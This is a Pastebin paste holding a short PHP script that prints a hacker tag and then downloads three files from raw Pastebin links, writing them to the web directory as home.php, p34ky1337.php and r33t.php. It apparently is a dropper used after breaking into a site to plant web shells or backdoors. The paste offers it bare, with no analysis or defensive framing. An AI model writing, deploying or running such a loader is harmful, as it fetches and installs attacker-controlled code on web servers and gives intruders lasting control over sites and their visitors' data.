Advertisement
Guest User

Untitled

a guest
Apr 22nd, 2018
105
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.56 KB | None | 0 0
  1. <?php
  2. echo "P34kyBl4ndrs";
  3.  
  4. $htaccess = "https://pastebin.com/raw/8HBFJYd5";
  5. $file = file_get_contents($htaccess);
  6. $open = fopen("home.php" , 'w');
  7. fwrite($open,$file);
  8. fclose($open);
  9.  
  10. $cgi = "https://pastebin.com/raw/A9yeF55J";
  11. $file = file_get_contents($cgi);
  12. $open = fopen("p34ky1337.php" , 'w');
  13. fwrite($open,$file);
  14. fclose($open);
  15.  
  16.  
  17. $cgi = "https://pastebin.com/raw/SWPHkTwJ";
  18. $file = file_get_contents($cgi);
  19. $open = fopen("r33t.php" , 'w');
  20. fwrite($open,$file);
  21. fclose($open);
  22.  
  23. ?>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement